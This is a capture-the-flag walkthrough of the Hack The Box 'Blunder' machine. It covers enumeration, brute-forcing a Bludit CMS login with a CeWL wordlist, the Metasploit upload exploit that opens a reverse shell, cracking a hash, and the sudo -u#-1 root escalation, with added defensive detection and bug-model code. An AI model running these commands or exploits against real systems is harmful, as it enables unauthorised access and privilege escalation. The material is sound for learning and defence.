HTB — Blunder Walkthrough

Exploitation using metasploit.


Information Gathering and Enumeration:

#NMAP Scan:
sudo nmap -A -T4 10.10.10.191 -oN nmap_blunder
-A = Enable OS detection, version detection, script scanning, and traceroute.
-T4 = Set timing template (higher is faster).
-oN = Output to file as Normal.
nmap_blunder = output file.

There is only one port open which is the TCP port 80.
Browse the web page for more information. One hint is that one of the words here is the password for the website.
Information from Wappalyzer.

#Directory busting using gobuster:
gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,php 2>/dev/null
dir = Use directory/file brute-forcing mode.
-u = host to be scanned.
-w = path to the wordlist.
-x = file extensions to look for.
2>/dev/null = redirects errors to /dev/null to reduce unwanted output.


#Visit interesting directories like /admin, /robots.txt, /todo.txt:

/admin:

Bludit is an interesting piece of information: Bludit is a CMS (Content Management System).

/robots.txt:

No useful information here!
From /todo.txt we learn that this is indeed a CMS, that FTP is turned off (which matches the NMAP scan), that old users have been removed, and that there is a username, “fergus”.

#Intercept login traffic using BurpSuite:

Install FoxyProxy or configure the proxy manually in your browser.
Once the traffic is intercepted by the proxy, right-click and choose “Send to Repeater”.
The website uses a CSRF token, so a Hydra http-post brute force is unlikely to work. Luckily, a Python script is available.

A CSRF token is a unique, secret, unpredictable value that is generated by the server-side application and transmitted to the client in such a way that it is included in a subsequent HTTP request made by the client.

Exploitation:

#Python script for brute forcing the login while handling the CSRF token:

So far we have set the username as “fergus” but we still need a wordlist for the password.

#Generating password wordlist from the webpage using CEWL:

CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

cewl -w wordlist.txt -d 10 -m 7 http://10.10.10.191
-w = Write the output to the file.
-d = Depth to spider to, default 2.
-m = Minimum word length, default 3.

CeWL gathered 142 words of at least 7 characters from the web page. This is done instead of using a typical wordlist, since one of the hints says that one of the words on the web page is the actual password.

#Brute forcing the login page http://10.10.10.191/admin/login

Run the Python script.
./bruteforce.py

Start the Python script for brute forcing.
Successfully brute forced the login.
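As an added defensive counterpart to the brute force above (example code written for this walkthrough, not from the original post or from Bludit): a CSRF token gives every login request a fresh value but does nothing to limit how many guesses a client can make, so the signal worth detecting is the volume of POSTs to /admin/login per source address. The access log lines, IP addresses and threshold below are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Apache/nginx combined-log style line: ip ident user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/admin/login"   # Bludit admin login, as targeted in the walkthrough
THRESHOLD = 10                # POSTs to the login page from one IP inside the window
WINDOW_SECONDS = 60

def parse_line(line: str) -> Optional[Tuple[str, datetime, str, str, int]]:
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])

def find_bruteforce(lines: List[str]) -> Dict[str, int]:
    """Map each source IP that exceeds THRESHOLD to its peak number of login
    POSTs seen within any WINDOW_SECONDS-long sliding window."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            per_ip[rec[0]].append(rec[1])
    flagged: Dict[str, int] = {}
    for ip, times in per_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > WINDOW_SECONDS:
                start += 1            # slide the window forward
            best = max(best, end - start + 1)
        if best >= THRESHOLD:
            flagged[ip] = best
    return flagged

# Constructed sample: 12 rapid login POSTs from one host (re-rendered login page,
# status 200) and a single normal login from another host.
SAMPLE_LOG = [
    f'10.10.14.5 - - [22/Jun/2020:10:00:{i:02d} +0000] "POST /admin/login HTTP/1.1" 200 1532'
    for i in range(12)
] + [
    '10.10.14.9 - - [22/Jun/2020:10:00:30 +0000] "POST /admin/login HTTP/1.1" 302 0',
    '10.10.14.9 - - [22/Jun/2020:10:00:31 +0000] "GET /admin/dashboard HTTP/1.1" 200 8891',
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```

The same logic can be run over the real log with lines read from a file; rate limiting or lockout on /admin/login is the corresponding mitigation.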

#Login to the Web page using the credentials gathered.

Username: fergus
Password: RolandDeschain

Successfully logged in using the credentials gathered.

#Check for existing exploits for Bludit:

Search for existing exploits in the Kali exploit database:
searchsploit bludit

There is an existing metasploit exploit module.

Search for the exploit in Metasploit:
msfconsole -q
search bludit type:exploit


Gather information about the exploit:
info exploit/linux/http/bludit_upload_images_exec

The required fields will have to be filled in.

#Use exploit module and configure options:

use exploit/linux/http/bludit_upload_images_exec
set rhosts 10.10.10.191
set lhost tun0
set BLUDITUSER fergus
set BLUDITPASS RolandDeschain
exploit


Post exploitation and privilege escalation:

#Drop to a shell and upgrade it using Python:
shell
python -c 'import pty; pty.spawn("/bin/bash")'


#Look for the user and root flag:

user.txt
root.txt

Unable to read user.txt so privilege must be escalated.

#Look for credentials for the users hugo or shaun:

Look for SSH username/password:

Unable to read the .ssh files.

#Let’s cheat for a bit and locate users.php

We got the password but it is hashed.

#Crack the password hash using online hash cracking sites:

Plaintext is Password120.

#Switch user from www-data to hugo:

su hugo


Check privileges using the sudo -l command.

#Locate and Read flags:

Under /home/hugo/
cat user.txt


cd /root/
cat root.txt

Privilege escalation is still needed for root.

#Escalate privilege to access the root flag:

sudo -l = list the user’s privileges or check a specific command.
sudo -u#-1 /bin/bash
-u = run the command (or edit the file) as the specified user name or ID.
#-1 = user ID -1. A bug in older sudo versions lets a rule that allows running a command as any user except root be bypassed by asking for user ID -1 (or its unsigned form 4294967295): the value is not 0, so the “not root” check passes, but the id switch treats -1 as “leave unchanged”, so the command runs as root.

Successfully gained access as root.
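A simplified model of the sudo bug used above, added for this walkthrough (this is illustrative code, not sudo’s own source): user IDs are modelled as 32-bit unsigned values like the C type uid_t, the “not root” rule is reduced to a single comparison, and the id switch is modelled after setresuid(), which treats (uid_t)-1 as “keep the current id”. The fixed rule shows the mitigation: refuse the -1 / 4294967295 sentinel as well as 0.

```python
from typing import Callable, Optional

UID_MASK = 0xFFFFFFFF   # uid_t is 32 bits wide; -1 wraps to 4294967295
ROOT_UID = 0
NO_CHANGE = UID_MASK    # setresuid() treats (uid_t)-1 as "keep the current id"

def parse_user_spec(spec: str) -> int:
    """Parse sudo's '#<id>' user form into a uid_t value with C wraparound."""
    if not spec.startswith("#"):
        raise ValueError("only the numeric '#<uid>' form is modelled here")
    return int(spec[1:], 10) & UID_MASK   # "#-1" -> 4294967295

def not_root_rule_vulnerable(uid: int) -> bool:
    """Pre-fix behaviour of a 'run as anyone except root' rule: only uid 0 is refused."""
    return uid != ROOT_UID

def not_root_rule_fixed(uid: int) -> bool:
    """Fixed behaviour (modelled): the -1 / 4294967295 sentinel is refused as well."""
    return uid != ROOT_UID and uid != NO_CHANGE

def setresuid_model(current_uid: int, requested_uid: int) -> int:
    """Model of setresuid(): the id is left untouched when asked for (uid_t)-1."""
    return current_uid if requested_uid == NO_CHANGE else requested_uid

def run_as(spec: str, rule: Callable[[int], bool]) -> Optional[int]:
    """Return the uid the command would run with, or None if the rule refuses it.
    sudo is already root when it drops to the target user, so the current id
    at the moment of the switch is 0."""
    uid = parse_user_spec(spec)
    if not rule(uid):
        return None
    return setresuid_model(ROOT_UID, uid)

if __name__ == "__main__":
    for spec in ("#-1", "#4294967295", "#1001", "#0"):
        print(spec, "vulnerable ->", run_as(spec, not_root_rule_vulnerable),
              "fixed ->", run_as(spec, not_root_rule_fixed))
```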
